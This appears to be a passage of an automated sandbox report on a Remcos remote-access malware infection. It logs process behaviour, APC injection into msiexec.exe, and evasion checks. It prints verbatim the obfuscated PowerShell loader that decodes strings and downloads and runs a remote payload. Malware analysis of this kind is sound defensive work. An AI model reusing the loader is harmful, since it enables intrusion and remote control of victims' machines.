              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5300Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4571Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7586Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2130Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_9-3118
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_9-3118
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-3089
              Source: C:\ProgramData\Remcos\remcos.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-2970
              Source: C:\ProgramData\Remcos\remcos.exeAPI coverage: 7.7 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2169804742.0000000006DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: powershell.exe, 00000001.00000002.1862598216.00000223D715F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E39219 LdrInitializeThunk,3_2_04E39219
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F59F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError,9_2_001F59F2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F8ADC Sleep,LoadLibraryW,GetProcAddress,9_2_001F8ADC
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F63E3 mov eax, dword ptr fs:[00000030h]9_2_001F63E3
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F9C10 SetUnhandledExceptionFilter,9_2_001F9C10
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F95F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_001F95F0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_2504.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 44D0000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetArugeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $telekabler; function katukina($fangedragters){$havanlggene=4;$protestantiskes=$havanlggene;do{$commissionship161+=$fangedragters[$protestantiskes];$protestantiskes+=5} until(!$fangedragters[$protestantiskes])$commissionship161}function myndiges($molossian120){ .($butleress) ($molossian120)}$katalogbestilling=katukina ' ovlntomme ejutappe.besvw';$katalogbestilling+=katukina 'b kkeaff.bu secsnitlbajai filefor nnonrt';$sylterne=katukina 'fortm s josirezanbeiskablthrol,hroaopre/';$nonagricultural=katukina 'non tsnerlstarsruff1revi2';$duplicand='slot[ansknhypeeetm tc ll.p gmslimne ba rcontvlistiovercovereha np staotidsi,kolnkl,pt sinmbec.a,quinsammabarsgafsteformrlege]ove.:om r:bhmns ribe a.lc ,otu goervejai pu,tmondyobskpgasvr pr.ofru.tkanoobol cte.mosperlrech=mi l$ ftenhum o ystnpresacounggapprsigii oupcshrau acklstuttto.dufiger.harareacl';$sylterne+=katukina 'stil5stin. mag0sold graa(lo rwsystimyxon pred runohellwmests pla frodnbirtt he v.s1 ble0temp..ili0lill; pol ka.ewim ei onan k i6n,ns4sulu;kati des,xve.s6gtev4cusp;dial kainrraphvkomm:slbe1liti3 ue 1tyra.smaa0so k) mya ,ecogbogeerye.chospkoptrooeer/aspe2phe 0sequ1topn0disl0rets1 .lv0rist1 ,ch kr ofglaii lcrscaleunrufstoronon,xtyra/di p1gris3give1 pul.oxyh0';$konfigurationsmanualers=katukina 'justulettsauspeprotrvitr-endaarastgmotoedro nmil t';$injuriesag=katukina 'mashhfrictgazetnoncpbefrs ana:fl n/st d/petuo towf met1,armxt.is. onci no cu deu .ub/shamcoppoakur.cprenzli ikmacrc d.rp ungfwh.l/ ovss begcborehdronmteleesrgeetoporre h.grunaunjec nata';$taxiflyene192=katukina 'p.em>';$butleress=katukina ' auti eroe d vx';$grubledes='tyrolervalsene';$overgreasiness='\wealthmaking.asr';myndiges (katukina 'inds$anstggl elungrotornbr.nda osalseab:skudaglansoverydowemunimpdef,t el oammot,elaeb dtst,oj=k rt$indbeforsn na v spe:e.kaagoldprakkp ahmdquananegltaffaasarg+arsi$skriosafivbarte intrhologhistrpyloe,lipasammsoverist.tn opbetol s lavs');myndiges (katukina 'olde$j,gog endlkrito xtrbacetagarrlplat:fisscke.ohrenloprickbrilsvl etvet atrmlrtu gt kale mulr al nafruela.i= paa$ordkiforsnart.jch fun.rsrpheni,ugueblacshemiasv,rglyri.fjers rdpstivl supifo,otja.u( .en$adgat n naladyx ondisubsf sa lso dys ine sven unfemoni1ca a9 ose2coa.)');myndiges (katukina $duplicand);$injuriesag=$chokstarterne[0];$remail=(katukina 'syzy$pseugcapnle.rioans b .ndaromalgran:bunkubi etspa iskueletambsul j icrearrolblndiuaneghy r=flyunrougeflatw k,e-frumo,teabunb j ederkescsnyltfabr g,nos adgy s ps midtundeeo ermexot. ,ar$s,nkkonycap ertddssaamphlramno fodg galbansgerhexsger trensijockla.ellf.mbibasinduelg');myndiges ($remail);myndiges (katukina 'kont$ elsuf.ortveltiequilh llbfluxjzooce genl awai ecog,han.,linh ubeesaddaf emdisopeprajr ruksophe[ ike$udlgknytao,ickn etefmagnia sogprinukursrafdea roitun.cim,ljohalvn ants stamstrbaperlng uruhandao,felvolie punrno fsin t]alti=skur$supeszoniy traldodetaruge
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $telekabler; function katukina($fangedragters){$havanlggene=4;$protestantiskes=$havanlggene;do{$commissionship161+=$fangedragters[$protestantiskes];$protestantiskes+=5} until(!$fangedragters[$protestantiskes])$commissionship161}function myndiges($molossian120){ .($butleress) ($molossian120)}$katalogbestilling=katukina ' ovlntomme ejutappe.besvw';$katalogbestilling+=katukina 'b kkeaff.bu secsnitlbajai filefor nnonrt';$sylterne=katukina 'fortm s josirezanbeiskablthrol,hroaopre/';$nonagricultural=katukina 'non tsnerlstarsruff1revi2';$duplicand='slot[ansknhypeeetm tc ll.p gmslimne ba rcontvlistiovercovereha np staotidsi,kolnkl,pt sinmbec.a,quinsammabarsgafsteformrlege]ove.:om r:bhmns ribe a.lc ,otu goervejai pu,tmondyobskpgasvr pr.ofru.tkanoobol cte.mosperlrech=mi l$ ftenhum o ystnpresacounggapprsigii oupcshrau 